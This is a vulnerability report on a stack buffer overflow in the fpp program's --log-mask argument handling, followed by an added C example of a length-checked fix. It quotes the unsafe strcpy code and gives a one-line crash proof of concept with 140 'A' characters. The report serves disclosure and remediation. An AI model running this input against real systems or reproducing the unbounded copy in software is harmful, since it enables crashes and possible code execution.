Stack-based Buffer Overflow in falconchristmas/fpp
Valid
Reported on May 30th 2021
✍️ Description
Hi,
There is a stack-based buffer overflow in https://github.com/FalconChristmas/fpp/blob/f4a1621c8be15a41305269830b700a2b5443aa0f/src/fpp.c#L177:

    else if((strcmp(argv[1],"--log-mask") == 0) && argc > 2)
    {
        char newMask[128];
        strcpy(newMask, argv[2]);//overflow
        /**/
    }

argv[2] is copied into newMask using strcpy, a function that doesn't perform size validation when it copies buffers.
This behavior leads to a buffer overflow.
🕵️‍♂️ Proof of Concept
Run: ./fpp --log-mask $(python -c'print("A"*140)')
💥 Impact
Crash, arbitrary code execution
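
One way to close this overflow, as an added example that is not part of the original report or fpp's own code: check the length of argv[2] against the destination size before copying, and reject oversized values instead of truncating them. The names parse_log_mask and LOG_MASK_MAX and the sample mask value "channel,data" are assumptions made for illustration.

```c
/* Added example: bounded handling of the --log-mask argument.
 * parse_log_mask() and LOG_MASK_MAX are hypothetical names, not fpp's code. */
#include <stdio.h>
#include <string.h>

#define LOG_MASK_MAX 128   /* same size as newMask[128] in the report */

/* Returns 0 when the mask was copied, 1 when argv does not carry
 * "--log-mask <value>", and -1 when the value does not fit in out. */
int parse_log_mask(int argc, char **argv, char *out, size_t out_size)
{
    if (out == NULL || out_size == 0)
        return -1;
    out[0] = '\0';                     /* never leave stale data behind */
    if (argc <= 2 || strcmp(argv[1], "--log-mask") != 0)
        return 1;

    size_t len = strlen(argv[2]);      /* argv strings are NUL-terminated */
    if (len >= out_size)               /* need room for the terminator too */
        return -1;                     /* reject instead of truncating */

    memcpy(out, argv[2], len + 1);     /* length already validated */
    return 0;
}

int main(void)
{
    char mask[LOG_MASK_MAX];
    char big[141];                     /* constructed input: 140 'A's, as in the PoC */
    memset(big, 'A', 140);
    big[140] = '\0';

    /* "channel,data" is a constructed sample value */
    char *ok_args[]  = { "fpp", "--log-mask", "channel,data" };
    char *bad_args[] = { "fpp", "--log-mask", big };

    int ok = parse_log_mask(3, ok_args, mask, sizeof mask);
    printf("normal value: %d (%s)\n", ok, mask);
    printf("140 bytes:    %d\n", parse_log_mask(3, bad_args, mask, sizeof mask));
    return 0;
}
```

Rejecting the argument keeps an over-long mask from being silently shortened into a different, valid-looking value.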